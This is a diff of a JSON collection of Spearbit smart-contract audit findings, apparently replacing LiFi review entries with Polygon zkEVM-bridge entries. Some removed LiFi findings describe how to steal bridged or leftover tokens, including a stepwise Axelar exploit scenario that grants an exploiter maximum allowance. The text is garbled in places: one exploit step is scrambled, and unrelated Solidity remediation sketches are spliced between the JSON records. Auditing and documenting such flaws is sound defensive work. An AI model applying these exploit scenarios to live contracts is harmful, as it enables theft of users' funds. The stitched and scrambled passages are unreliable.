It is easy to make fake websites which trick users into signing transactions which seem to be for LiFi but result in loosing tokens. With the current design, the power of smart contracts isnt used and it introduces numerous risks as described in the rest of this report.", + "title": "Limit gas usage of _updateBatchFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function _updateBatchFee() loops through all unverified batches. Normally this would be 30 min / 5 min ~ 6 batches. Assume the aggregator malfunctions and after one week, verifyBatches() is called, which calls _updateBatchFee(). Then there could be 7 * 24 * 60 min / 5 min ~ 2016 batches. The function verifyBatches() limits this to MAX_VERIFY_BATCHES == 1000. This might result in an out-of-gas error. This would possibly require multiple verifyBatches() tries with a smaller number of batches, which would increase network outage. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... while (currentBatch != currentLastVerifiedBatch) { ... if (block.timestamp - currentSequencedBatchData.sequencedTimestamp > verifyBatchTimeTarget) { ... } ... } ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Bridge with Axelar can be stolen with malicious external call", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Executor contract allows users to build an arbitrary payload external call to any address except address(erc20Proxy). erc20Proxy is not the only dangerous address to call. By building a malicious external call to Axelar gateway, exploiters can steal users funds. The Executor does swaps at the destination chain. By setting the receiver address to the Executor contract at the destination chain, Li-Fi can help users to get the best price. Executor inherits IAxelarExecutable. execute and executeWithToken validates the payload and executes the external call. IAxelarExecutable.sol#L27-L40 function executeWithToken( bytes32 commandId, string calldata sourceChain, string calldata sourceAddress, bytes calldata payload, string calldata tokenSymbol, uint256 amount ) external { bytes32 payloadHash = keccak256(payload); if (!gateway.validateContractCallAndMint(commandId, sourceChain, sourceAddress, payloadHash, ,! tokenSymbol, amount)) revert NotApprovedByGateway(); _executeWithToken(sourceChain, sourceAddress, payload, tokenSymbol, amount); } The nuance lies in the Axelar gateway AxelarGateway.sol#L133-L148. Once the receiver calls validateContract- CallAndMint with a valid payload, the gateway mints the tokens to the receiver and marks it as executed. It is the receiver contracts responsibility to execute the external call. Exploiters can build a malicious external call to trigger validateContractCallAndMint, the Axelar gateway would mint the tokens to the Executor contract. The exploiter can then pull the tokens from the Executor contract. The possible exploit scenario 1. Exploiter build a malicious external call. token.approve(address(exploiter), type(uint256).max) 2. A victim user uses the AxelarFacet to bridge tokens. Since the destination bridge has the best price, the users set the receiver to address(Executor) and finish the swap with this.swapAndCompleteBridgeTokens 3. Exploiter observes the victims bridge tx and way.validateContractCallAndMint.
exploiter can pull the minted token from the executor contract since theres max allowance. The executor the minted token. builds an contract gets external call to trigger gate- The 4. The victim calls Executor.execute() with the valid payload. However, since the payload has been triggered by the exploiter, its no longer valid. 12", + "title": "Keep precision in _updateBatchFee()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Function _updateBatchFee() uses a trick to prevent losing precision in the calculation of accDivisor. The value accDivisor includes an extra multiplication with batchFee, which is undone when doing batchFee = (batchFee * batchFee) / accDivisor because this also contains an extra multiplication by batchFee. However, if batchFee happens to reach a small value (also see issue Minimum and maximum value for batchFee) then the trick doesn't work that well. In the extreme case of batchFee == 0 a division by 0 will take place, resulting in a revert. Luckily this doesn't happen in practice. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: High Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "LibSwap may pull tokens that are different from the specified asset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "LibSwap.swap is responsible for doing swaps. Its designed to swap one asset at a time. The _- swapData.callData is provided by user and the LiFi protocol only checks its signature. As a result, users can build a calldata to swap a different asset as specified. For example, the users can set fromAssetId = dai provided addLiquidity(usdc, dai, ...) as call data. The uniswap router would pull usdc and dai at the same time. If there were remaining tokens left in the LiFi protocol, users can sweep tokens from the protocol. library LibSwap { function swap(bytes32 transactionId, SwapData calldata _swapData) internal { ... if (!LibAsset.isNativeAsset(fromAssetId)) { LibAsset.maxApproveERC20(IERC20(fromAssetId), _swapData.approveTo, fromAmount); if (toDeposit != 0) { LibAsset.transferFromERC20(fromAssetId, msg.sender, address(this), toDeposit); } } else { nativeValue = fromAmount; } // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory res) = _swapData.callTo.call{ value: nativeValue ,! }(_swapData.callData); if (!success) { string memory reason = LibUtil.getRevertMsg(res); revert(reason); } }", + "title": "Minimum and maximum value for batchFee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "Function _updateBatchFee() updates the batchFee depending on the batch time target. If the batch times are repeatedly below or above the target, the batchFee could shrink or grow without limit. If the batchFee would get too low, problems with the economic incentives might arise. If the batchFee would get too high, overflows might occur. Also, the fee might be too high to be practically payable. Although not very likely to occur in practice, it is probably worth the trouble to implement limits. function _updateBatchFee(uint64 newLastVerifiedBatch) internal { ...
if (totalBatchesBelowTarget < totalBatchesAboveTarget) { ... batchFee = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); } else { ... uint256 accDivisor = (batchFee * (uint256(multiplierBatchFee) ** diffBatches)) / (10 ** (diffBatches * 3)); batchFee = (batchFee * batchFee) / accDivisor; } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Check slippage of swaps", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "Several bridges check that the output of swaps isnt 0. However it could also happen that swap give a positive output, but still lower than expected due to slippage / sandwiching / MEV. Several AMMs will have a mechanism to limit slippage, but it might be useful to add a generic mechanism as multiple swaps in sequence might have a relative large slippage. function swapAndStartBridgeTokensViaOmniBridge(...) ... { ... uint256 amount = _executeAndCheckSwaps(_lifiData, _swapData, payable(msg.sender)); if (amount == 0) { revert InvalidAmount(); } _startBridge(_lifiData, _bridgeData, amount, true); }", + "title": "Bridge deployment will fail if initialize() is front-run", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The deployment scripts use upgrades.deployProxy() with no type specified. This function accepts data which is used to initialize the state of the contract being deployed. However, because the zkEVM bridge script utilizes the output of each contract address on deployment, it is not trivial to atomically deploy and initialize contracts. As a result, there is a small time window available for attackers to front-run calls to initialize the necessary bridge contracts, allowing them to temporarily DoS the deployment process.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Replace createRetryableTicketNoRefundAliasRewrite() with depositEth()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _startBridge() of the ArbitrumBridgeFacet uses createRetryableTicketNoRefun- dAliasRewrite(). According to the docs: address-aliasing, this method skips some address rewrite magic that depositEth() does. Normally depositEth() should be used, according to the docs depositing-and-withdrawing-ether. Also this method will be deprecated after nitro: Inbox.sol#L283-L297. While the bridge doesnt do these checks of depositEth(), it is easy for developers, that call the LiFi contracts directly, to make mistakes and loose tokens. function _startBridge(...) ... { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }(...); } ... ... }", + "title": "Add input validation for the setVerifyBatchTimeTarget method", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The setVerifyBatchTimeTarget method in PolygonZkEVM accepts a uint64 newVerifyBatchTimeTarget argument to set the verifyBatchTimeTarget. This variable has a value of 30 minutes in the initialize method, so it is expected that it shouldn't hold a very big value as it is compared to a timestamp difference in _updateBatchFee.
Since there is no upper bound for the value of the newVerifyBatchTimeTarget argument, it is possible (for example due to fat-fingering the call) that an admin passes a big value (up to type(uint64).max) which will result in a wrong calculation in _updateBatchFee.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Hardcode or whitelist the Axelar destinationAddress", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions executeCallViaAxelar() and executeCallWithTokenViaAxelar() call a destina- tionAddress on the destinationChain. This destinationAddress needs to have specific Axelar functions (_ex- ecute() and _executeWithTokento() ) be able to receive the calls. This is implemented in the Executor. If these functions dont exist at the destinationAddress, the transferred tokens will be lost. /// @param destinationAddress the address of the LiFi contract on the destinationChain function executeCallViaAxelar(..., string memory destinationAddress, ...) ... { ... s.gateway.callContract(destinationChain, destinationAddress, payload); } Note: the comment \"the address of the LiFi contract\" isnt clear, it could either be the LiFi Diamond or the Execu- tor.", + "title": "Single-step process for critical ownership transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "If the nominated newAdmin or newOwner account is not a valid account, the owner or admin risks locking themselves out. function setAdmin(address newAdmin) public onlyAdmin { admin = newAdmin; emit SetAdmin(newAdmin); } function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), \"Ownable: new owner is the zero address\"); _transferOwnership(newOwner); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "WormholeFacet doesnt send native token", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The functions of WormholeFacet allow sending the native token, however they dont actually send it across the bridge, causing the native token to stay stuck in the LiFi Diamond and get lost for the sender. contract WormholeFacet is ILiFi, ReentrancyGuard, Swapper { function startBridgeTokensViaWormhole(... ) ... payable ... { // is payable LibAsset.depositAsset(_wormholeData.token, _wormholeData.amount); // allows native token _startBridge(_wormholeData); ... } function _startBridge(WormholeData memory _wormholeData) private { ... LibAsset.maxApproveERC20(...); // geared towards ERC20, also works when `msg.value` is set // no { value : .... } IWormholeRouter(_wormholeData.wormholeRouter).transferTokens(...); } }", + "title": "Ensure no native asset value is sent in payable method that can handle ERC20 transfers as well", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridgeAsset method of PolygonZkEVMBridge is marked payable as it can work both with the native asset as well as with ERC20 tokens. In the codepath where it is checked that the token is not the native asset but an ERC20 token, it is not validated that the user did not actually provide value to the transaction.
The likelihood of this happening is pretty low since it requires a user error, but if it does happen, the native asset value will be stuck in the PolygonZkEVMBridge contract.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "ArbitrumBridgeFacet does not check if msg.value is enough to cover the cost", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The ArbitrumBridgeFacet does not check whether the users provided ether (msg.value) is enough to cover _amount + cost. If there are remaining ethers in LiFis LibDiamond address, exploiters can set a large cost and sweep the ether. function _startBridge( ... ) private { ... uint256 cost = _bridgeData.maxSubmissionCost + _bridgeData.maxGas * _bridgeData.maxGasPrice; if (LibAsset.isNativeAsset(_bridgeData.assetId)) { gatewayRouter.createRetryableTicketNoRefundAliasRewrite{ value: _amount + cost }( ... ); } else { gatewayRouter.outboundTransfer{ value: cost }( ... ); }", + "title": "Calls to the name, symbol and decimals functions will be unsafe for non-standard ERC20 tokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The bridgeAsset method of PolygonZkEVMBridge accepts an address token argument and later calls the name, symbol and decimals methods of it. There are two potential problems with this: 1. Those methods are not mandatory in the ERC20 standard, so there can be ERC20-compliant tokens that lack some or all of the name, symbol or decimals methods; such tokens will not be usable with the protocol because the calls will revert 2. There are tokens that use bytes32 instead of string as the value type of their name and symbol storage variables and their getter functions (an example is MKR). This can cause reverts when trying to consume metadata from those tokens. Also, see weird-erc20 for nonstandard tokens.", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Low Risk" ] }, { - "title": "Underpaying Optimism l2gas may lead to loss of funds", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The OptimismBridgeFacet uses Optimisms bridge with user-provided l2gas. function _startBridge( LiFiData calldata _lifiData, BridgeData calldata _bridgeData, uint256 _amount, bool _hasSourceSwap ) private { ... if (LibAsset.isNativeAsset(_bridgeData.assetId)) { bridge.depositETHTo{ value: _amount }(_bridgeData.receiver, _bridgeData.l2Gas, \"\"); } else { ... bridge.depositERC20To( _bridgeData.assetId, _bridgeData.assetIdOnL2, _bridgeData.receiver, _amount, _bridgeData.l2Gas, \"\" ); } } Optimisms standard token bridge makes the cross-chain deposit by sending a cross-chain message to L2Bridge.
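The "Minimum and maximum value for batchFee" finding a few entries above suggests bounding the fee. A minimal sketch of such a clamp follows; the bound values are illustrative placeholders, not numbers from the report:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Sketch: clamp batchFee after the multiplier/divisor logic of
// _updateBatchFee() has run. Bounds are placeholders, not audited values.
contract BatchFeeClampSketch {
    uint256 internal constant _MIN_BATCH_FEE = 1 gwei;     // placeholder
    uint256 internal constant _MAX_BATCH_FEE = 1000 ether; // placeholder
    uint256 public batchFee = 1 ether;

    function _clampBatchFee() internal {
        if (batchFee < _MIN_BATCH_FEE) {
            batchFee = _MIN_BATCH_FEE; // keeps economic incentives intact
        } else if (batchFee > _MAX_BATCH_FEE) {
            batchFee = _MAX_BATCH_FEE; // keeps the fee payable, avoids overflow
        }
    }
}
```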
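For the "Single-step process for critical ownership transfer" finding, the usual remedy is a two-step handover where the nominee must accept before the role changes hands. A minimal sketch, with function names chosen for illustration rather than taken from the codebase:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Sketch of a two-step admin transfer: a typo'd or invalid nominee can
// simply be overwritten, and the role only moves once the nominee accepts.
contract TwoStepAdmin {
    address public admin;
    address public pendingAdmin;

    event SetAdmin(address newAdmin);

    modifier onlyAdmin() {
        require(msg.sender == admin, "TwoStepAdmin: only admin");
        _;
    }

    constructor() {
        admin = msg.sender;
    }

    // Step 1: current admin nominates a successor (re-callable to correct mistakes).
    function transferAdminRole(address newPendingAdmin) external onlyAdmin {
        pendingAdmin = newPendingAdmin;
    }

    // Step 2: the successor proves control of the address by accepting.
    function acceptAdminRole() external {
        require(msg.sender == pendingAdmin, "TwoStepAdmin: only pending admin");
        admin = pendingAdmin;
        pendingAdmin = address(0);
        emit SetAdmin(admin);
    }
}
```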
L1StandardBridge.sol#L114-L123 17 // Construct calldata for finalizeDeposit call bytes memory message = abi.encodeWithSelector( IL2ERC20Bridge.finalizeDeposit.selector, address(0), Lib_PredeployAddresses.OVM_ETH, _from, _to, msg.value, _data ); // Send calldata into L2 // slither-disable-next-line reentrancy-events sendCrossDomainMessage(l2TokenBridge, _l2Gas, message); If the l2Gas is underpaid, finalizeDeposit will fail and user funds will be lost.", + "title": "Use calldata instead of memory for array parameters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The code frequently uses memory arrays for externally called functions. Some gas could be saved by making these calldata. The calldata can also be cascaded to internal functions that are called from the external functions. function claimAsset(bytes32[] memory smtProof) public { ... _verifyLeaf(smtProof); ... } function _verifyLeaf(bytes32[] memory smtProof) internal { ... verifyMerkleProof(smtProof); ... } function verifyMerkleProof(..., bytes32[] memory smtProof, ...) internal { ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Funds can be locked during the recovery stage", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The recovery is an address that should receive funds if the execution fails on destination do- main. This ensures that funds are never lost with failed calls. However, in the AmarokFacet It is hardcoded as msg.sender. Several unexpected behaviour can be observed with this implementation. If the msg.sender is a smart contract, It might not be available on the destination chain. If the msg.sender is a smart contract and deployed on the other chain, the contract maybe will not have function to withdraw native token. As a result of this implementation, funds can be locked when an execution fails. 18 contract AmarokFacet is ILiFi, SwapperV2, ReentrancyGuard { ... IConnextHandler.XCallArgs memory xcallArgs = IConnextHandler.XCallArgs({ params: IConnextHandler.CallParams({ to: _bridgeData.receiver, callData: _bridgeData.callData, originDomain: _bridgeData.srcChainDomain, destinationDomain: _bridgeData.dstChainDomain, agent: _bridgeData.receiver, recovery: msg.sender, forceSlow: false, receiveLocal: false, callback: address(0), callbackFee: 0, relayerFee: 0, slippageTol: _bridgeData.slippageTol }), transactingAssetId: _bridgeData.assetId, amount: _amount }); ... }", + "title": "Optimize networkID == MAINNET_NETWORK_ID", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The value for networkID is defined in initialize() and MAINNET_NETWORK_ID is constant. So networkID == MAINNET_NETWORK_ID can be calculated in initialize() and stored to save some gas. It is even cheaper if networkID is immutable, which would require adding a constructor. uint32 public constant MAINNET_NETWORK_ID = 0; uint32 public networkID; function initialize(uint32 _networkID, ...) public virtual initializer { networkID = _networkID; ... } function _verifyLeaf(...) ... { ... if (networkID == MAINNET_NETWORK_ID) { ... } else { ...
} }", "labels": [ "Spearbit", - "LIFI", - "Severity: Low Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "What if the receiver of Axelar _executeWithToken() doesnt claim all tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _executeWithToken() approves tokens and then calls callTo. If that contract doesnt retrieve the tokens then the tokens stay within the Executor and are lost. Also see: \"Remaining tokens can be sweeped from the LiFi Diamond or the Executor\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeWithToken(...) ... { ... // transfer received tokens to the recipient IERC20(tokenAddress).approve(callTo, amount); (bool success, ) = callTo.call(callData); ... } }", + "title": "Optimize updateExitRoot()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The function updateExitRoot() accesses the global variables lastMainnetExitRoot and las- tRollupExitRoot multiple times. This can be optimized using temporary variables. function updateExitRoot(bytes32 newRoot) external { ... if (msg.sender == rollupAddress) { lastRollupExitRoot = newRoot; } if (msg.sender == bridgeAddress) { lastMainnetExitRoot = newRoot; } bytes32 newGlobalExitRoot = keccak256( abi.encodePacked(lastMainnetExitRoot, lastRollupExitRoot) ); if ( ... ) { ... emit UpdateGlobalExitRoot(lastMainnetExitRoot, lastRollupExitRoot); } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Remaining tokens can be sweeped from the LiFi Diamond or the Executor", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The initial balance of (native) tokens in both the Lifi Diamond and the Executor contract can be sweeped by all the swap functions in all the bridges, which use the following functions: swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol _executeAndCheckSwaps() of SwapperV2.sol _executeAndCheckSwaps() of Swapper.sol swapAndCompleteBridgeTokens() of XChainExecFacet Although these functions ... swapAndCompleteBridgeTokensViaStargate() of Executor.sol swapAndCompleteBridgeTokens() of Executor.sol swapAndExecute() of Executor.sol swapAndCompleteBridgeTokens() of XChainExecFacet have the following code: if (!LibAsset.isNativeAsset(transferredAssetId)) { startingBalance = LibAsset.getOwnBalance(transferredAssetId); // sometimes transfer tokens in } else { startingBalance = LibAsset.getOwnBalance(transferredAssetId) - msg.value; } // do swaps uint256 postSwapBalance = LibAsset.getOwnBalance(transferredAssetId); if (postSwapBalance > startingBalance) { LibAsset.transferAsset(transferredAssetId, receiver, postSwapBalance - startingBalance); } This doesnt protect the initial balance of the first tokens, because it can just be part of a swap to another token. The initial balances of intermediate tokens are not checked or protected. As there normally shouldnt be (native) tokens in the LiFi Diamond or the Executor the risk is limited. 
Note: set the risk to medium as there are other issues in this report that leave tokens in the contracts Although in practice there is some dust in the LiFi Diamond and the Executor: 0x362fa9d0bca5d19f743db50738345ce2b40ec99f 0x46405a9f361c1b9fc09f2c83714f806ff249dae7", + "title": "Optimize _setClaimed()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The functions claimAsset() and claimMessage() first verify !isClaimed() (via the function _verifyLeaf()) and then do _setClaimed(). These two functions can be combined into a more efficient version. function claimAsset(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function claimMessage(...) ... { _verifyLeaf(...); _setClaimed(index); ... } function _verifyLeaf(...) ... { require( !isClaimed(index), ...); ... } function isClaimed(uint256 index) public view returns (bool) { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; uint256 claimedWord = claimedBitMap[claimedWordIndex]; uint256 mask = (1 << claimedBitIndex); return (claimedWord & mask) == mask; } function _setClaimed(uint256 index) private { uint256 claimedWordIndex = index / 256; uint256 claimedBitIndex = index % 256; claimedBitMap[claimedWordIndex] = claimedBitMap[claimedWordIndex] | (1 << claimedBitIndex); }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Wormhole bridge chain IDs are different than EVM chain IDs", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "According to documentation, Wormhole uses different chain ids than EVM based chain ids. However, the code is implemented with block.chainid check. LiFi is integrated with third party platforms through API. The API/UI side can implement chain id checks, but direct interaction with the contract can lead to loss of funds. function _startBridge(WormholeData memory _wormholeData) private { if (block.chainid == _wormholeData.toChainId) revert CannotBridgeToSameNetwork(); } From other perspective, the following line limits the recipient address to an EVM address. done to a non EVM chain (e.g. Solana, Terra, Terra classic), then the tokens would be lost. If a bridge would be ... bytes32(uint256(uint160(_wormholeData.recipient))) ... Example transactions below. Chainid 1 Solana Chainid 3 Terra Classic On the other hand, the usage of the LiFi protocol depends largely on off chain APIs. It takes all values, fees, limits, chain ids and addresses to be called from the APIs. As previously mentioned, the wormhole destination chain ids are different than standard EVM based chains, the following event can be misinterpreted. ... emit LiFiTransferStarted( _lifiData.transactionId, \"wormhole\", \"\", _lifiData.integrator, _lifiData.referrer, _swapData[0].sendingAssetId, _lifiData.receivingAssetId, _wormholeData.recipient, _swapData[0].fromAmount, _wormholeData.toChainId, // It does not show correct chain id which is expected by LiFi Data Analytics true, false ,! ); ...", + "title": "SMT branch comparisons can be optimised", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "When verifying a Merkle proof, the search does not terminate until we have iterated through the tree depth to calculate the Merkle root.
The path is represented by the lower 32 bits of the index variable where each bit represents the direction of the path taken. Two changes can be made to the following snippet of code: Bit shift currentIndex to the right instead of dividing by 2. Avoid overwriting the currentIndex variable and perform the bitwise comparison in-line. function verifyMerkleProof( ... uint256 currrentIndex = index; for ( uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++ ) { if ((currrentIndex & 1) == 1) node = keccak256(abi.encodePacked(smtProof[height], node)); else node = keccak256(abi.encodePacked(node, smtProof[height])); currrentIndex /= 2; } }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "Facets approve arbitrary addresses for ERC20 tokens", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "All the facets pointed above approve an address for an ERC20 token, where both these values are provided by the user: LibAsset.maxApproveERC20(IERC20(token), router, amount); The parameter names change depending on the context. So for any ERC20 token that LifiDiamond contract holds, user can: call any of the functions in these facets to approve another address for that token. use the approved address to transfer tokens out of LifiDiamond contract. Note: normally there shouldnt be any tokens in the LiFi Diamond contract so the risk is limited. Note: also see \"Hardcode bridge addresses via immutable\"", + "title": "Increments can be optimised by prefixing variable with ++", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "There are small gas savings when prefixing increments with ++. Sometimes this can be used to combine multiple statements, like in function _deposit(). function _deposit(bytes32 leafHash) internal { ... depositCount += 1; uint256 size = depositCount; ... } Other occurrences of ++: PolygonZkEVM.sol: for (uint256 i = 0; i < batchesNum; i++) { PolygonZkEVM.sol: currentLastForceBatchSequenced++; PolygonZkEVM.sol: currentBatchSequenced++; PolygonZkEVM.sol: lastPendingState++; PolygonZkEVM.sol: lastForceBatch++; PolygonZkEVM.sol: for (uint256 i = 0; i < batchesNum; i++) { PolygonZkEVM.sol: currentLastForceBatchSequenced++; PolygonZkEVM.sol: currentBatchSequenced++; lib/DepositContract.sol: height++ lib/DepositContract.sol: for (uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++) { lib/DepositContract.sol: for (uint256 height = 0; height < _DEPOSIT_CONTRACT_TREE_DEPTH; height++) { lib/TokenWrapped.sol: nonces[owner]++, verifiers/Verifier.sol: for (uint i = 0; i < elements; i++) { verifiers/Verifier.sol: for (uint i = 0; i < input.length; i++) { verifiers/Verifier.sol: for (uint i = 0; i < input.length; i++) {", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk AcrossFacet.sol#L103, ArbitrumBridge-" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "FeeCollector not well integrated", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "There is a contract to pay fees for using the bridge: FeeCollector. This is used by crafting a transaction by the frontend API, which then calls the contract via _executeAndCheckSwaps().
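The "Optimize _setClaimed()" finding above can be sketched as a single read-modify-write over the bitmap word. The helper name is hypothetical; the bitmap layout mirrors the isClaimed()/_setClaimed() excerpt:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Sketch: combine the !isClaimed() check and _setClaimed() so the bitmap
// word is read once and written once per claim.
contract ClaimBitmapSketch {
    mapping(uint256 => uint256) public claimedBitMap;

    // Reverts if the leaf was already claimed, otherwise marks it claimed.
    function _setAndCheckClaimed(uint256 index) internal {
        uint256 wordIndex = index / 256;
        uint256 mask = 1 << (index % 256);
        uint256 word = claimedBitMap[wordIndex]; // single SLOAD
        require(word & mask == 0, "AlreadyClaimed");
        claimedBitMap[wordIndex] = word | mask;  // single SSTORE
    }
}
```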
Here is an example of the contract Here is an example of the contract of such a transaction Its whitelisted here This way no fees are paid if a developer is using the LiFi contracts directly. Also it is using a mechanism that isnt suited for this. The _executeAndCheckSwaps() is geared for swaps and has several checks on balances. These (and future) checks could interfere with the fee payments. Also this is a complicated and non transparent approach. The project has suggested to see _executeAndCheckSwaps() as a multicall mechanism.", + "title": "Move initialization values from initialize() to immutable via constructor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/zkEVM-bridge-Spearbit-27-March.pdf", + "body": "The contracts PolygonZkEVM and PolygonZkEVMBridge initialize variables via initialize(). If these variables are never updated they could also be made immutable, which would save some gas. In order to achieve that, a constructor has to be added to set the immutable variables. This could be applicable for chainID in contract PolygonZkEVM and networkID in contract PolygonZkEVMBridge. contract PolygonZkEVM is ... { ... uint64 public chainID; ... function initialize(...) ... { ... chainID = initializePackedParameters.chainID; ... } contract PolygonZkEVMBridge is ... { ... uint32 public networkID; ... function initialize(uint32 _networkID,...) ... { networkID = _networkID; ... }", "labels": [ "Spearbit", - "LIFI", - "Severity: Medium Risk" + "zkEVM-bridge", + "Severity: Gas Optimization" ] }, { - "title": "_executeSwaps of Executor.sol doesnt have a whitelist", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-Spearbit-Security-Review.pdf", - "body": "The function _executeSwaps() of Executor.sol doesnt have a whitelist, whereas _executeSwaps() of SwapperV2.sol does have a whitelist. Calling arbitrary addresses is dangerous. For example, unlimited al- lowances can be set to allow stealing of leftover tokens in the Executor contract. Luckily, there wouldnt normally be allowances set from users to the Executor.sol so the risk is limited. Note: also see \"Too generic calls in GenericBridgeFacet allow stealing of tokens\" contract Executor is IAxelarExecutable, Ownable, ReentrancyGuard, ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { if (_swapData[i].callTo == address(erc20Proxy)) revert UnAuthorized(); // Prevent calling ,! ERC20 Proxy directly LibSwap.SwapData calldata currentSwapData = _swapData[i]; LibSwap.swap(_lifiData.transactionId, currentSwapData); } } contract SwapperV2 is ILiFi { function _executeSwaps(... ) ... { for (uint256 i = 0; i < _swapData.length; i++) { LibSwap.SwapData calldata currentSwapData = _swapData[i]; if ( !(appStorage.dexAllowlist[currentSwapData.approveTo] && appStorage.dexAllowlist[currentSwapData.callTo] && appStorage.dexFuncSignatureAllowList[bytes32(currentSwapData.callData[:8])]) ) revert ContractCallNotAllowed(); LibSwap.swap(_lifiData.transactionId, 